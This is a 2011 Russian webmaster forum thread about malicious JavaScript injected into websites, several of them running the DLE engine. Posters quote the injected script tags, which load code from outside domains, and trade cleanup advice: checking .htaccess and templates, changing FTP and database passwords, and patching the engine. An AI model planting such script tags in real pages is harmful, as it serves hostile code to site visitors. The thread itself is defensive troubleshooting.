Вредоносный код на сайте

[Удален]

30 января 2011, 19:38

998

Здравствуйте. Вот недавно, именно ГУГЛ (яша молчит) нашёл вредоносный код на сайте.

Гугл пишет,Возможный внедренный код

<script language="JavaScript" charset="windows-1251" rel="no

follow" src="http://maroder.info/js/if.php?id=2848">

Причём как-то странно гугл реагирует, то показывает что он есть, то его нет, может кто-то с подобным сталкивался ?

-------

В исходном коде нигде нет, фтп прорыл, тоже не нашёл, поискал в БД и там нету. Как выследить, де же этот вредоносный код ?

П.С. Вот сайт: http://wowzg.ru

вирус найден на страницах:

/

/addons/

/addons/sborki-addons/

Очень надеюсь на вашу помощь.

R

159

refroz

31 января 2011, 00:30

#1

Проверь файл htaccess, файлы шаблона, поменяй пароли фтп

Если не найдешь, переустанови чистый движок

108

webeditor

31 января 2011, 00:57

#2

А че делать нечего? Вот посмотрите мой зараженный сайт!!! Вы уверены, что вирус безопасен? Где здравый смысл?

P.S. Сейчас на форуме хостинга был, там аналогичная ситуация, такой же "тормоз" сует всем свой сайт посмотреть.

Куплю любой ваш сайт (https://goo.gl/bFFa4p) Без сомнения лучший недорогой хостинг (https://goo.gl/QaAKmT)

Устройство антивирусной системы Яндекса Google: еще больше информации Yahoo Photos будет закрыт

O1

107

Oleg1073

31 января 2011, 07:19

#3

webeditor:
А че делать нечего? Вот посмотрите мой зараженный сайт!!! Вы уверены, что вирус безопасен? Где здравый смысл?

P.S. Сейчас на форуме хостинга был, там аналогичная ситуация, такой же "тормоз" сует всем свой сайт посмотреть.

У меня тоже такая ситуация в краткой и полной новости в конце поста (сайт на DLE 9.0) отображается код <script src="http://....org/da91c6e7f2272faa5f28700502a90d6b.js" type="text/javascript"></script>, обнаружил позавчера, перерыл кучу файлов, но найти не могу. Поначалу при загрузке страницы каспер ругался, сейчас нет, онлайн проверки на вирус ничего не дают, но код есть и как его удалить?

Oleg1073 добавил 31.01.2011 в 12:05

проблема решена, кому надо решение здесь, да и ставьте патч.

Лучший сервис для вывода Webmoney (http://goo.gl/VRF0fP) Cамый честный ФО (https://goo.gl/LocpXq) 60% с продаж и ребиллов без шейва (https://goo.gl/aIsOQS)

Вирус на сайте, как Java script Взломали сайт на DLE

108

vital917

31 января 2011, 10:33

#4

Oleg1073:
У меня тоже такая ситуация в краткой и полной новости в конце поста (сайт на DLE 9.0) отображается код <script src="http://....org/da91c6e7f2272faa5f28700502a90d6b.js" type="text/javascript"></script>, обнаружил позавчера, перерыл кучу файлов, но найти не могу. Поначалу при загрузке страницы каспер ругался, сейчас нет, онлайн проверки на вирус ничего не дают, но код есть и как его удалить?

После этого обязательно проверить комп на вирусы, сменить пароли FTP и БД. и поставить заплатки на двигло от взломов!

[Удален]

31 января 2011, 12:37

#5

Ну так кто-нить выграть этот вирус?

VM

45

VETERCOM

11 февраля 2011, 22:11

#6

у меня все сайты так хакнули тепер базу ремонтирую уже неделю

[Удален]

13 февраля 2011, 21:00

#7

VETERCOM:
у меня все сайты так хакнули тепер базу ремонтирую уже неделю

Движок какой?

[Удален]

13 февраля 2011, 22:48

#8

У меня Яша обнаружил вредоносный код на сайте! Движок DLE!

Код был в каждой новости сайта, чистил в ручную! Хорошо, что новостей на сайте было не много!

Кароче говоря, отключил регистрацию на сайте, поменял пароли в админкеи ftp.

Пока всё в норме.

BitCash.ru - Сочный конверт InstallMonster.ru- уникальная файловая партнерка Вредоносный код на сайте

NS

27

non-stop

19 февраля 2011, 10:57

#9

Вылечить базу и Закрыть дыру в ДЛЕ можно здесь ☝

Что такое Power BI и зачем это нужно бизнесу

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов